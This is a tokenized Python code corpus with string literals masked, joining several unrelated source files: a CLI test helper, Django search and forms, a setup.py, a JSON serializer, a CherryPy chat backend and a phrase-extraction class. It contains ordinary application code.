<EOL> if args is None : <EOL> args = [ ] <EOL> self . write_config ( self . _settings ) <EOL> args . insert ( <NUM_LIT:0> , command_name ) <EOL> args . insert ( <NUM_LIT:0> , '<STR_LIT>' % self . taxi_dir ) <EOL> args . insert ( <NUM_LIT:0> , '<STR_LIT>' % self . config_file ) <EOL> runner = CliRunner ( ) <EOL> result = runner . invoke ( cli , args , input = input , standalone_mode = False ) <EOL> if result . exception : <EOL> raise result . exception <EOL> return result . output <EOL> class override_settings ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , settings = None , container = None ) : <EOL> self . settings = settings or { } <EOL> self . container = container <EOL> def __call__ ( self , func ) : <EOL> if isinstance ( func , type ) : <EOL> self . container = func <EOL> self . enable ( ) <EOL> return func <EOL> else : <EOL> @ wraps ( func ) <EOL> def inner ( * args , ** kwargs ) : <EOL> self . container = args [ <NUM_LIT:0> ] <EOL> with self : <EOL> return func ( * args , ** kwargs ) <EOL> return inner <EOL> def enable ( self ) : <EOL> if not hasattr ( self . container , '<STR_LIT>' ) : <EOL> self . container . _settings = { } <EOL> self . original_settings = copy . deepcopy ( self . container . _settings ) <EOL> for section , settings in six . iteritems ( self . settings ) : <EOL> if section not in self . container . _settings : <EOL> self . container . _settings [ section ] = { } <EOL> for setting , value in six . iteritems ( settings ) : <EOL> self . container . _settings [ section ] [ setting ] = value <EOL> def disable ( self ) : <EOL> self . container . _settings = self . original_settings <EOL> def __enter__ ( self ) : <EOL> self . enable ( ) <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . disable ( ) <EOL> def recursive_update ( d , u ) : <EOL> """<STR_LIT>""" <EOL> for k , v in six . iteritems ( u ) : <EOL> if isinstance ( v , collections . Mapping ) : <EOL> r = recursive_update ( d . get ( k , { } ) , v ) <EOL> d [ k ] = r <EOL> else : <EOL> d [ k ] = u [ k ] <EOL> return d </s>
<s> '''<STR_LIT>''' <EOL> from puppet . models import FactValue <EOL> from django . db import DatabaseError <EOL> from django . db . models import Q <EOL> from django . utils . translation import ugettext as _ <EOL> from django . conf import settings <EOL> def search ( q ) : <EOL> '''<STR_LIT>''' <EOL> if q is None or len ( q ) == <NUM_LIT:0> or '<STR_LIT>' not in settings . INSTALLED_APPS : <EOL> return FactValue . objects . none ( ) <EOL> try : <EOL> q . __iter__ ( ) <EOL> except AttributeError : <EOL> q = ( q , ) <EOL> ids = [ ] <EOL> try : <EOL> for key in q : <EOL> base = FactValue . objects . filter ( value__icontains = key ) <EOL> base = base . filter ( <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) <EOL> ) <EOL> ids . extend ( base . distinct ( ) . values_list ( '<STR_LIT:id>' , flat = True ) ) <EOL> ids = list ( set ( ids ) ) <EOL> ret = FactValue . objects . filter ( pk__in = ids ) <EOL> ret = ret . distinct ( ) . order_by ( '<STR_LIT>' ) <EOL> return ret <EOL> except DatabaseError as e : <EOL> return FactValue . objects . none ( ) <EOL> raise RuntimeError ( _ ( '<STR_LIT>' ) % { '<STR_LIT>' : e } ) </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> classifiers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> zip_safe = False , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> uni = unicode <EOL> else : <EOL> uni = str <EOL> import collections <EOL> import json <EOL> import uuid <EOL> from base64 import b64decode <EOL> from base64 import b64encode <EOL> from flowy . result import is_result_proxy , TaskError , SuspendTask , wait <EOL> from flowy . operations import first <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def check_err_and_placeholders ( result , value ) : <EOL> err , placeholders = result <EOL> try : <EOL> wait ( value ) <EOL> except TaskError : <EOL> if err is None : <EOL> err = value <EOL> else : <EOL> err = first ( err , value ) <EOL> except SuspendTask : <EOL> placeholders = True <EOL> return err , placeholders <EOL> def collect_err_and_results ( result , value ) : <EOL> err , results = result <EOL> if not is_result_proxy ( value ) : <EOL> return result <EOL> try : <EOL> wait ( value ) <EOL> except TaskError : <EOL> if err is None : <EOL> err = value <EOL> else : <EOL> err = first ( err , value ) <EOL> except SuspendTask : <EOL> pass <EOL> else : <EOL> if results is None : <EOL> results = [ ] <EOL> results . append ( value ) <EOL> return err , results <EOL> def traverse_data ( value , f = check_err_and_placeholders , initial = ( None , False ) , seen = frozenset ( ) , make_list = True ) : <EOL> if is_result_proxy ( value ) : <EOL> try : <EOL> wait ( value ) <EOL> except TaskError : <EOL> return value , f ( initial , value ) <EOL> except SuspendTask : <EOL> return value , f ( initial , value ) <EOL> return value . __wrapped__ , f ( initial , value ) <EOL> if isinstance ( value , ( bytes , uni ) ) : <EOL> return value , f ( initial , value ) <EOL> res = initial <EOL> if isinstance ( value , collections . Iterable ) : <EOL> if id ( value ) in seen : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> seen = seen | frozenset ( [ id ( value ) ] ) <EOL> if isinstance ( value , collections . Mapping ) : <EOL> d = { } <EOL> for k , v in value . items ( ) : <EOL> k_ , res = traverse_data ( k , f , res , seen , make_list = False ) <EOL> v_ , res = traverse_data ( v , f , res , seen , make_list = make_list ) <EOL> d [ k_ ] = v_ <EOL> return d , res <EOL> if ( <EOL> isinstance ( value , collections . Iterable ) <EOL> and isinstance ( value , collections . Sized ) <EOL> ) : <EOL> l = [ ] <EOL> for x in value : <EOL> x_ , res = traverse_data ( x , f , res , seen , make_list = make_list ) <EOL> l . append ( x_ ) <EOL> if make_list : <EOL> return l , res <EOL> return tuple ( l ) , res <EOL> if isinstance ( value , collections . Iterable ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return value , f ( initial , value ) <EOL> def dumps ( value ) : <EOL> return json . dumps ( _tag ( value ) ) <EOL> def _tag ( value ) : <EOL> if isinstance ( value , uuid . UUID ) : <EOL> return { '<STR_LIT>' : value . hex } <EOL> elif isinstance ( value , bytes ) : <EOL> return { '<STR_LIT>' : b64encode ( value ) . decode ( '<STR_LIT:ascii>' ) } <EOL> elif callable ( getattr ( value , '<STR_LIT>' , None ) ) : <EOL> return _tag ( value . __json__ ( ) ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> return [ _tag ( x ) for x in value ] <EOL> elif isinstance ( value , dict ) : <EOL> return dict ( ( k , _tag ( v ) ) for k , v in value . items ( ) ) <EOL> return value <EOL> def loads ( value ) : <EOL> return json . loads ( value , object_hook = _obj_hook ) <EOL> def _obj_hook ( obj ) : <EOL> if len ( obj ) != <NUM_LIT:1> : <EOL> return obj <EOL> key , value = next ( iter ( obj . items ( ) ) ) <EOL> if key == '<STR_LIT>' : <EOL> return uuid . UUID ( value ) <EOL> elif key == '<STR_LIT>' : <EOL> return b64decode ( value ) <EOL> return obj </s>
<s> __author__ = '<STR_LIT>' <EOL> from django import forms <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . auth . forms import UserCreationForm <EOL> from django . forms import ModelForm <EOL> from survey . models import UserProfile <EOL> class RegistrationForm ( UserCreationForm ) : <EOL> username = forms . CharField ( max_length = <NUM_LIT:30> , min_length = <NUM_LIT:3> , label = '<STR_LIT>' ) <EOL> email = forms . EmailField ( label = "<STR_LIT>" ) <EOL> password1 = forms . CharField ( widget = forms . PasswordInput , min_length = <NUM_LIT:5> , label = '<STR_LIT>' ) <EOL> password2 = forms . CharField ( widget = forms . PasswordInput , min_length = <NUM_LIT:5> , label = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = User <EOL> fields = ( "<STR_LIT:username>" , "<STR_LIT:email>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class EditProfileForm ( ModelForm ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( EditProfileForm , self ) . __init__ ( * args , ** kwargs ) <EOL> try : <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . user . first_name <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . user . last_name <EOL> except User . DoesNotExist : <EOL> pass <EOL> first_name = forms . CharField ( max_length = <NUM_LIT:30> , required = False ) <EOL> last_name = forms . CharField ( max_length = <NUM_LIT:30> , required = False ) <EOL> class Meta : <EOL> model = UserProfile <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def save ( self , * args , ** kw ) : <EOL> super ( EditProfileForm , self ) . save ( * args , ** kw ) <EOL> self . instance . user . first_name = self . cleaned_data . get ( '<STR_LIT>' ) <EOL> self . instance . user . last_name = self . cleaned_data . get ( '<STR_LIT>' ) <EOL> self . instance . user . save ( ) </s>
<s> import time <EOL> import json <EOL> import cherrypy <EOL> import markdown <EOL> import urllib . parse <EOL> import functools <EOL> import collections <EOL> import hashlib <EOL> def jsonify ( function ) : <EOL> @ functools . wraps ( function ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> return json . dumps ( function ( * args , ** kwargs ) ) . encode ( ) <EOL> return wrapper <EOL> class ChatMixIn ( object ) : <EOL> def create_new_room ( self , room ) : <EOL> self . db . request ( "<STR_LIT:POST>" , "<STR_LIT>" % <EOL> ( self . couchdb_prefix ) , body = room ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } ) <EOL> return room [ "<STR_LIT>" ] <EOL> def find_room ( self , num_id ) : <EOL> rooms = self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" <EOL> "<STR_LIT>" % self . couchdb_prefix ) <EOL> s = [ i for i in rooms [ '<STR_LIT>' ] if i [ "<STR_LIT:key>" ] == num_id ] <EOL> return self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" % <EOL> ( self . couchdb_prefix , s [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) ) if s else None <EOL> def get_n_rooms ( self ) : <EOL> try : <EOL> return len ( self . db . request ( "<STR_LIT:GET>" , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % self . couchdb_prefix ) [ "<STR_LIT>" ] ) <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> @ cherrypy . expose <EOL> def post_message ( self , room , message ) : <EOL> if cherrypy . request . method != "<STR_LIT:POST>" : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> reply , highlight , prepend = None , [ ] , None <EOL> if message . startswith ( "<STR_LIT>" ) and "<STR_LIT:U+0020>" in message : <EOL> reply = message . split ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:2> : ] <EOL> r_msg = self . find_message ( room , reply ) <EOL> if r_msg : <EOL> message = message . replace ( "<STR_LIT>" + reply , "<STR_LIT>" ) <EOL> highlight = [ r_msg ] <EOL> p = self . find_user ( r_msg ) <EOL> if p : <EOL> if p [ "<STR_LIT:name>" ] : <EOL> p = ( "<STR_LIT:@>" + p [ "<STR_LIT:name>" ] . split ( ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> p = "<STR_LIT>" + p [ "<STR_LIT>" ] <EOL> prepend = p <EOL> else : <EOL> reply = None <EOL> for i in [ j [ <NUM_LIT:1> : ] for j in message . lower ( ) . split ( ) if j . startswith ( "<STR_LIT:@>" ) ] : <EOL> u = list ( self . find_user_by_name ( '<STR_LIT>' . join ( j for j in i if j in <EOL> "<STR_LIT>" ) ) ) <EOL> if u : <EOL> highlight . extend ( u ) <EOL> self . update_user ( user [ "<STR_LIT>" ] , { '<STR_LIT>' : time . time ( ) } ) <EOL> message = { <EOL> '<STR_LIT>' : self . safe ( message ) , <EOL> '<STR_LIT>' : self . onebox_html ( self . markdown ( self . onebox ( message ) ) ) , <EOL> '<STR_LIT:date>' : time . time ( ) , <EOL> '<STR_LIT:user>' : user [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : self . get_num_id ( ) , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : reply , <EOL> '<STR_LIT>' : highlight , <EOL> '<STR_LIT>' : prepend , <EOL> } <EOL> self . inc_message_count ( room ) <EOL> self . do_get_messages . cache_clear ( ) <EOL> self . db . request ( "<STR_LIT:POST>" , "<STR_LIT>" % <EOL> ( self . couchdb_prefix , room ) , body = message ) <EOL> def find_user_by_name ( self , name ) : <EOL> users = self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" <EOL> "<STR_LIT>" % self . couchdb_prefix ) <EOL> name = '<STR_LIT>' . join ( i for i in name . lower ( ) if i in <EOL> "<STR_LIT>" ) <EOL> if "<STR_LIT>" in users : <EOL> for i in users [ "<STR_LIT>" ] : <EOL> n , i = i [ "<STR_LIT:key>" ] , i [ "<STR_LIT:value>" ] <EOL> if n and name . strip ( ) == n . split ( ) [ <NUM_LIT:0> ] . lower ( ) . strip ( ) : <EOL> yield i <EOL> def find_message ( self , room , num_id ) : <EOL> r = self . db . request ( "<STR_LIT:POST>" , ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % <EOL> ( self . couchdb_prefix , room ) ) <EOL> if "<STR_LIT>" in r : <EOL> r = [ i for i in r [ "<STR_LIT>" ] if i [ "<STR_LIT:key>" ] == num_id ] <EOL> return r [ <NUM_LIT:0> ] [ "<STR_LIT:value>" ] if r else None <EOL> def markdown ( self , content ) : <EOL> return markdown . markdown ( content , safe_mode = "<STR_LIT>" ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> def read_messages ( self , room = "<STR_LIT>" , last_atime = "<STR_LIT>" ) : <EOL> if self . get_user ( ) : <EOL> self . active_users [ room ] [ self . get_user ( ) [ "<STR_LIT>" ] ] = time . time ( ) <EOL> return self . do_get_messages ( room , last_atime ) <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> @ functools . lru_cache ( <NUM_LIT:100> ) <EOL> def do_get_messages ( self , room , last_atime ) : <EOL> if float ( last_atime ) <= <NUM_LIT:1> : <EOL> last_atime = time . time ( ) - ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:7> ) <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> room_data = self . find_room ( room ) <EOL> if room_data [ "<STR_LIT:type>" ] == "<STR_LIT>" and user [ "<STR_LIT>" ] not in room_data [ "<STR_LIT>" ] : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> data = self . db . request ( "<STR_LIT:GET>" , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( <EOL> self . couchdb_prefix , room , json . dumps ( float ( last_atime ) ) ) ) <EOL> if "<STR_LIT>" in data : <EOL> data = [ i [ '<STR_LIT:value>' ] for i in data [ "<STR_LIT>" ] ] <EOL> else : <EOL> data = [ ] <EOL> data = list ( sorted ( data , key = lambda x : x [ "<STR_LIT:date>" ] ) ) <EOL> if len ( data ) >= <NUM_LIT:50> : <EOL> data = data [ - <NUM_LIT:50> : ] <EOL> for i in data : <EOL> i [ '<STR_LIT:user>' ] = self . find_user ( i [ "<STR_LIT:user>" ] ) <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT:email>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] = self . safe ( i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] ) <EOL> if data : <EOL> last_atime = max ( i [ "<STR_LIT:date>" ] for i in data ) <EOL> for i in data : <EOL> i [ "<STR_LIT>" ] = time . strftime ( "<STR_LIT>" , time . gmtime ( i [ "<STR_LIT:date>" ] ) ) <EOL> return { '<STR_LIT>' : last_atime , '<STR_LIT:data>' : data } <EOL> def inc_message_count ( self , num_id ) : <EOL> room = self . find_room ( num_id ) <EOL> room [ "<STR_LIT>" ] += <NUM_LIT:1> <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = room ) <EOL> @ cherrypy . expose <EOL> def star ( self , room , message_id ) : <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> d = self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) ) <EOL> if user [ "<STR_LIT>" ] not in d [ "<STR_LIT>" ] and user [ "<STR_LIT>" ] != d [ "<STR_LIT:user>" ] : <EOL> d [ "<STR_LIT>" ] . append ( user [ "<STR_LIT>" ] ) <EOL> self . get_starred . cache_clear ( ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) , body = d ) <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> return json . dumps ( True ) . encode ( ) <EOL> @ cherrypy . expose <EOL> def unstar ( self , room , message_id ) : <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> d = self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) ) <EOL> if user [ "<STR_LIT>" ] in d [ "<STR_LIT>" ] and user [ "<STR_LIT>" ] != d [ "<STR_LIT:user>" ] : <EOL> d [ "<STR_LIT>" ] . remove ( user [ "<STR_LIT>" ] ) <EOL> self . get_starred . cache_clear ( ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) , body = d ) <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> return json . dumps ( True ) . encode ( ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> @ functools . lru_cache ( <NUM_LIT:100> ) <EOL> def get_starred ( self , room = "<STR_LIT>" ) : <EOL> if self . get_user ( ) : <EOL> last_atime = time . time ( ) - ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> data = self . db . request ( "<STR_LIT:GET>" , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( <EOL> self . couchdb_prefix , room , json . dumps ( float ( last_atime ) ) ) ) <EOL> if "<STR_LIT>" in data : <EOL> data = [ i [ '<STR_LIT:value>' ] for i in data [ "<STR_LIT>" ] ] <EOL> else : <EOL> data = [ ] <EOL> for i in data : <EOL> i [ '<STR_LIT:user>' ] = self . find_user ( i [ "<STR_LIT:user>" ] ) <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT:email>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] = self . safe ( i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] ) <EOL> data = sorted ( data , key = lambda x : len ( x [ "<STR_LIT>" ] ) , reverse = True ) <EOL> data = list ( i for i in data if i [ "<STR_LIT>" ] ) [ : <NUM_LIT:10> ] <EOL> data = sorted ( data , key = lambda x : x [ "<STR_LIT:date>" ] , reverse = True ) <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> h = hashlib . md5 ( "<STR_LIT>" . join ( i [ "<STR_LIT>" ] + str ( len ( i [ "<STR_LIT>" ] ) ) <EOL> for i in data ) . encode ( ) ) . hexdigest ( ) <EOL> for i in data : <EOL> i [ "<STR_LIT>" ] = time . strftime ( "<STR_LIT>" , time . gmtime ( i [ "<STR_LIT:date>" ] ) ) <EOL> return { '<STR_LIT>' : last_atime , '<STR_LIT:data>' : data , '<STR_LIT>' : h } <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> def get_user_list ( self , room ) : <EOL> self . active_users [ room ] = { k : v for k , v in <EOL> self . active_users [ room ] . items ( ) if time . time ( ) - v < <NUM_LIT:10> } <EOL> r = list ( self . find_user ( i ) for i in self . active_users [ room ] . keys ( ) ) <EOL> for i in r : <EOL> del i [ "<STR_LIT:email>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> i [ "<STR_LIT:name>" ] = self . safe ( i [ "<STR_LIT:name>" ] ) <EOL> data = sorted ( r , key = lambda x : x [ "<STR_LIT>" ] or "<STR_LIT>" ) <EOL> h = hashlib . md5 ( "<STR_LIT>" . join ( i [ "<STR_LIT>" ] <EOL> for i in data ) . encode ( ) ) . hexdigest ( ) <EOL> return { "<STR_LIT:data>" : data , "<STR_LIT>" : h } <EOL> @ cherrypy . expose <EOL> def remove_user_from_room ( self , room , num_id ) : <EOL> room_num_id = room <EOL> room = self . find_room ( room ) <EOL> user = self . get_user ( ) <EOL> if user and user [ "<STR_LIT>" ] == room [ "<STR_LIT>" ] : <EOL> if num_id in room [ "<STR_LIT>" ] : <EOL> room [ "<STR_LIT>" ] . remove ( num_id ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = room ) <EOL> self . do_get_messages . cache_clear ( ) <EOL> raise cherrypy . HTTPRedirect ( "<STR_LIT>" % room_num_id ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> def add_user_to_room ( self , room , user_url = "<STR_LIT>" ) : <EOL> room_num_id = room <EOL> room = self . find_room ( room ) <EOL> user = self . get_user ( ) <EOL> if user and user [ "<STR_LIT>" ] == room [ "<STR_LIT>" ] : <EOL> u = urllib . parse . urlparse ( user_url ) . path . split ( "<STR_LIT:/>" ) <EOL> if len ( u ) > <NUM_LIT:2> and u [ <NUM_LIT:1> ] == "<STR_LIT>" and self . find_user ( u [ <NUM_LIT:2> ] ) : <EOL> if u [ <NUM_LIT:2> ] not in room [ "<STR_LIT>" ] : <EOL> room [ "<STR_LIT>" ] . append ( u [ <NUM_LIT:2> ] ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = room ) <EOL> raise cherrypy . HTTPRedirect ( "<STR_LIT>" % room_num_id ) </s>
<s> import sys <EOL> class RefPhrases ( object ) : <EOL> '''<STR_LIT>''' <EOL> tot_ref_phrases = <NUM_LIT:0> <EOL> phrasesDict = { } <EOL> sentPhrasesDoD = { } <EOL> def __init__ ( self , sent_id , refFiles ) : <EOL> '''<STR_LIT>''' <EOL> self . loadReferencePhrases ( sent_id , refFiles ) <EOL> def loadReferencePhrases ( self , sent_id , refFiles ) : <EOL> '''<STR_LIT>''' <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> refHLst = [ open ( file , '<STR_LIT:r>' ) for file in refFiles ] <EOL> for file_i , refH in enumerate ( refHLst ) : <EOL> sys . stderr . write ( "<STR_LIT>" % ( refFiles [ file_i ] ) ) <EOL> sent_i = sent_id <EOL> for sent in refH : <EOL> sent = sent . strip ( ) <EOL> self . xtractPhrases ( sent_i , sent ) <EOL> sent_i += <NUM_LIT:1> <EOL> refH . close ( ) <EOL> def xtractPhrases ( self , sent_i , sent ) : <EOL> '''<STR_LIT>''' <EOL> refToks = sent . split ( ) <EOL> sent_len = len ( refToks ) <EOL> if not RefPhrases . sentPhrasesDoD . has_key ( sent_i ) : <EOL> RefPhrases . sentPhrasesDoD [ sent_i ] = { } <EOL> for ref_j in xrange ( sent_len ) : <EOL> for ref_k in xrange ( ref_j + <NUM_LIT:1> , sent_len + <NUM_LIT:1> ) : <EOL> ref_phr = '<STR_LIT:U+0020>' . join ( refToks [ ref_j : ref_k ] ) <EOL> if RefPhrases . phrasesDict . has_key ( ref_phr ) : <EOL> RefPhrases . phrasesDict [ ref_phr ] += <NUM_LIT:1> <EOL> else : <EOL> RefPhrases . phrasesDict [ ref_phr ] = <NUM_LIT:1> <EOL> RefPhrases . tot_ref_phrases += <NUM_LIT:1> <EOL> if not RefPhrases . sentPhrasesDoD [ sent_i ] . has_key ( ref_phr ) : <EOL> RefPhrases . sentPhrasesDoD [ sent_i ] [ ref_phr ] = <NUM_LIT:1> <EOL> return None <EOL> @ classmethod <EOL> def isValidRefPhr ( cls , ref_phr ) : <EOL> return cls . phrasesDict . has_key ( ref_phr ) <EOL> @ classmethod <EOL> def isValidRefPhrNSent ( cls , sent_id , ref_phr ) : <EOL> if not cls . sentPhrasesDoD . has_key ( sent_id ) : <EOL> sys . stderr . write ( "<STR_LIT>" % ( sent_id ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> return cls . sentPhrasesDoD [ sent_id ] . has_key ( ref_phr ) <EOL> @ classmethod <EOL> def printRefPhrases ( cls , sent_id ) : <EOL> '''<STR_LIT>''' <EOL> for ref_phr in cls . sentPhrasesDoD . keys ( sent_id ) : <EOL> sys . stderr . write ( "<STR_LIT>" % ( ref_phr ) ) <EOL> return None </s>
